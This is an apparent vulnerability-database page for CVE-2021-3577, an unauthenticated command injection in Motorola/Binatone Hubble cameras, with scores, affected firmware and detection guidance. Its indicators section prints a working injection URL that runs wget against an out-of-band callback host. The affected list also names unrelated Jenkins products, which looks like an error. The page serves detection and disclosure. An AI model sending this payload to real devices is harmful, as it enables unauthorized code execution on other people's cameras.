cbcvebase.
CVE-2021-3577
published 2021-11-12

CVE-2021-3577: An unauthenticated remote code execution vulnerability was reported in some Motorola-branded Binatone Hubble Cameras that could allow an attacker on the same…

PriorityP184high8.8CVSS 3.1
AVAACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
59.89%
99.0th percentile
An unauthenticated remote code execution vulnerability was reported in some Motorola-branded Binatone Hubble Cameras that could allow an attacker on the same network unauthorized access to the device.

Affected

9 ranges
VendorProductVersion rangeFixed in
binatoneglobalcomfort_85_connect_firmware< 03.40.0203.40.02
binatoneglobalfocus_72r_firmware< 03.40.0003.40.00
binatoneglobalhalo_+_camera_firmware< 03.50.1403.50.14
binatoneglobalmbp3855_firmware< 03.40.0003.40.00
jenkinsgit_plugin
jenkinsjenkins_core
jenkinsjenkins_lts
jenkinsjenkins_weekly
motorolabinatone_hubble_cameras

Detection & IOCsextracted from sources · hover to see the quote

url/?action=command&command=set_city_timezone&value=$(wget%20http://{{interactsh-url}}))
commandset_city_timezone
  • Look for HTTP GET requests targeting the query parameter pattern `?action=command&command=set_city_timezone&value=$(<cmd>)` on IoT camera web interfaces — this is the exploit path for CVE-2021-3577 command injection.
  • Confirm exploitation via out-of-band HTTP callback (OAST/interactsh): a successful injection will cause the device to issue an outbound HTTP request to an attacker-controlled host.
  • Response body containing the string `set_city_timezone` alongside HTTP 200 status confirms the vulnerable endpoint is reachable and processed the injected command parameter.
  • The vulnerability requires no authentication and is exploitable by any attacker on the same network segment (AV:A, PR:N per CVSS). Monitor for unauthenticated requests to `/?action=command` on Motorola/Binatone Hubble camera HTTP ports.
  • ·The Nuclei template uses `{{interactsh-url}}` as a placeholder for an out-of-band callback server; replace with a real OAST/interactsh endpoint when operationalizing the detection or exploit proof-of-concept.
  • ·Affected scope is limited to Binatone Halo+ camera firmware (cpe:2.3:o:binatoneglobal:halo\+_camera_firmware); detections should be scoped to that device family to reduce false positives.
  • ·Attack vector is Adjacent Network (AV:A), meaning exploitation requires the attacker to be on the same network as the camera — detections on internet-facing sensors will not capture this threat; focus on internal/LAN traffic monitoring.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.05.8MEDIUMAV:A/AC:L/Au:N/C:P/I:P/A:P
vulncheck8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.